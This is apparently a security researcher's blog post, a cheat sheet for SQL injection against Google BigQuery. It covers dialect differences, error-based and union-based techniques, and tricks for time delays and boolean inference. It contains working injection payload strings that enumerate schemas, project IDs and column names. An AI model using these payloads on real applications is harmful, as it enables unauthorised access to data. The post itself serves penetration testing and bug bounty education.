BigQuery SQL Injection Cheat Sheet

  • There are two different query mechanisms (dialects) exist. Standard and legacy. Standard is the default one for now and legacy is the old reference that they are using. While most of the application is using standard one, old ones could still be using legacy one.
  • You can switch between the dialects within adding prefixes as #legacySQL and #standardSQL at the beginning of the queries, however those are working only at the beginning of the queries. So when you try to inject inside a query via SQL injection, you cannot switch between those dialects since you cannot inject at the first beginning of the query as a first line. (Unless a specific/different injection point), so this is only important to know which syntax you should use on injection.
  • On the legacy SQL, queries are like:
SELECT column-name FROM [project-name:dataset-name.table-name]
  • While it is different at standard SQL as:
SELECT column-name FROM `project-name:dataset-name.table-name`
  • So the main differences between those standards are legacy is using [] while standard is using `` for SELECT ... FROM ... operations.
  • As most of you know, on the regular SQL technologies, we have a structure as Databases -> Tables -> Columns -> Data. On the BigQuery, this is a little bit different because we can also have access to the other databases/datasets as well because technology is using cloud. So we have a structure as Project Names -> Datasets (Equivalent as database) -> Tables -> Columns -> Data.
Syntax error returns with single quote
  • Time based functions does not exist in the BigQuery syntax. So there are no SLEEP or WAITFOR DELAY functions exist, which makes time-based injections not possible.
  • Error based may work and also documented within division by zero technique such as in this blog post with the payloads such as
' OR if(1/(length((select('a')))-1)=1,true,false) OR '
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
Union based SQL injection example
  • Back-tick characters (`) are blocked or sanitized at the back-end of the application.
  • User-ids of the users were not sequential and hard to brute-force because of being 10+ digit numbers.
SELECT * FROM INFORMATION_SCHEMA.SCHEMATA
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
Error based BigQuery SQL injection
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
  • Usage of different datasets: While there are no functions exist for time based functionalities, big datasets could be used to create time delays via https://cloud.google.com/bigquery/public-data with using SELECT's from different projects.
  • Boolean based injections (IF clauses): If statements are not working inside of the SELECT queries, hence boolean based injections would not be working perfectly as well. Our experience shows as if the query starts with WITH clause, boolean based injections are not possible. If not, SUBSTRING functionality can be used. (Full payload is below.) Still, for WITH clause, experiment for different cases could be possible and it still could be tried within different query structures. https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting#if
  • New functionalities: Since BigQuery is a cloud based solution, escalating to this injection to other server-side vulnerabilities such as RCE does not seems possible as well. However in the future, within new functionalities or different solutions as well, different scenarios could be evaluated as well.
  • Playground: All commands can be easily tested at the cloud SQL workspace here: https://console.cloud.google.com/bigquery (Including the all public datasets!)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ozgur Alp

Ozgur Alp

Independent Bug Bounty Hunter & Offensive Security Consultant